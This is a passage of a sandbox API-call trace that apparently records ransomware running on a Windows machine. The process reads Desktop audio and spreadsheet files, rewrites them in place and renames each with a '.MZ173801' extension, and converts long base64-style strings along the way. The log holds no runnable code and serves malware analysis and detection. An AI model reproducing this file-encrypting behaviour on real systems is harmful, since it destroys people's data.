lpUsedDefaultChar=0x0) returned 814 [0123.422] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.423] GetCurrentThreadId () returned 0x1358 [0123.423] GetCurrentThreadId () returned 0x1358 [0123.423] GetCurrentThreadId () returned 0x1358 [0123.423] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\txD8odKDry6.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\txd8odkdry6.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.423] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.423] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.423] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x16a38 [0123.423] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.423] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x16a38, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x16a38, lpOverlapped=0x0) returned 1 [0123.424] CloseHandle (hObject=0x410) returned 1 [0123.426] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\txD8odKDry6.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\txd8odkdry6.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.427] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x16a38, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x16a38, lpOverlapped=0x0) returned 1 [0123.430] CloseHandle (hObject=0x410) returned 1 [0123.430] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\txD8odKDry6.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\txd8odkdry6.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\txD8odKDry6.wav.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\txd8odkdry6.wav.mz173801")) returned 1 [0123.430] GetCurrentThreadId () returned 0x1358 [0123.430] GetCurrentThreadId () returned 0x1358 [0123.430] GetCurrentThreadId () returned 0x1358 [0123.430] GetCurrentThreadId () returned 0x1358 [0123.430] GetCurrentThreadId () returned 0x1358 [0123.430] GetCurrentThreadId () returned 0x1358 [0123.430] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77407a30, ftCreationTime.dwHighDateTime=0x1d5e4dc, ftLastAccessTime.dwLowDateTime=0xd92291f0, ftLastAccessTime.dwHighDateTime=0x1d5e619, ftLastWriteTime.dwLowDateTime=0xd92291f0, ftLastWriteTime.dwHighDateTime=0x1d5e619, nFileSizeHigh=0x0, nFileSizeLow=0x16808, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="tXkulrENDM Y6hF.m4a", cAlternateFileName="TXKULR~1.M4A")) returned 1 [0123.430] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.430] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.430] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tXkulrENDM Y6hF.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\txkulrendm y6hf.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77407a30, ftCreationTime.dwHighDateTime=0x1d5e4dc, ftLastAccessTime.dwLowDateTime=0xd92291f0, ftLastAccessTime.dwHighDateTime=0x1d5e619, ftLastWriteTime.dwLowDateTime=0xd92291f0, ftLastWriteTime.dwHighDateTime=0x1d5e619, nFileSizeHigh=0x0, nFileSizeLow=0x16808)) returned 1 [0123.431] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.431] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.431] GetCurrentThreadId () returned 0x1358 [0123.431] GetCurrentThreadId () returned 0x1358 [0123.431] GetCurrentThreadId () returned 0x1358 [0123.432] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.432] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.432] GetCurrentThreadId () returned 0x1358 [0123.432] GetCurrentThreadId () returned 0x1358 [0123.432] GetCurrentThreadId () returned 0x1358 [0123.432] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\tXkulrENDM Y6hF.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\txkulrendm y6hf.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.432] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.432] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.432] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x16808 [0123.432] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.432] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x16808, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x16808, lpOverlapped=0x0) returned 1 [0123.434] CloseHandle (hObject=0x410) returned 1 [0123.435] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\tXkulrENDM Y6hF.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\txkulrendm y6hf.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.437] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x16808, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x16808, lpOverlapped=0x0) returned 1 [0123.442] CloseHandle (hObject=0x410) returned 1 [0123.442] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\tXkulrENDM Y6hF.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\txkulrendm y6hf.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\tXkulrENDM Y6hF.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\txkulrendm y6hf.m4a.mz173801")) returned 1 [0123.443] GetCurrentThreadId () returned 0x1358 [0123.443] GetCurrentThreadId () returned 0x1358 [0123.443] GetCurrentThreadId () returned 0x1358 [0123.443] GetCurrentThreadId () returned 0x1358 [0123.443] GetCurrentThreadId () returned 0x1358 [0123.443] GetCurrentThreadId () returned 0x1358 [0123.443] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x654d1800, ftCreationTime.dwHighDateTime=0x1d5ebef, ftLastAccessTime.dwLowDateTime=0xc7e36be0, ftLastAccessTime.dwHighDateTime=0x1d5f05e, ftLastWriteTime.dwLowDateTime=0xc7e36be0, ftLastWriteTime.dwHighDateTime=0x1d5f05e, nFileSizeHigh=0x0, nFileSizeLow=0x110de, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="TZsHRoCh7.xls", cAlternateFileName="TZSHRO~1.XLS")) returned 1 [0123.443] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.443] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.443] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\TZsHRoCh7.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\tzshroch7.xls"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x654d1800, ftCreationTime.dwHighDateTime=0x1d5ebef, ftLastAccessTime.dwLowDateTime=0xc7e36be0, ftLastAccessTime.dwHighDateTime=0x1d5f05e, ftLastWriteTime.dwLowDateTime=0xc7e36be0, ftLastWriteTime.dwHighDateTime=0x1d5f05e, nFileSizeHigh=0x0, nFileSizeLow=0x110de)) returned 1 [0123.443] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.443] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.444] GetCurrentThreadId () returned 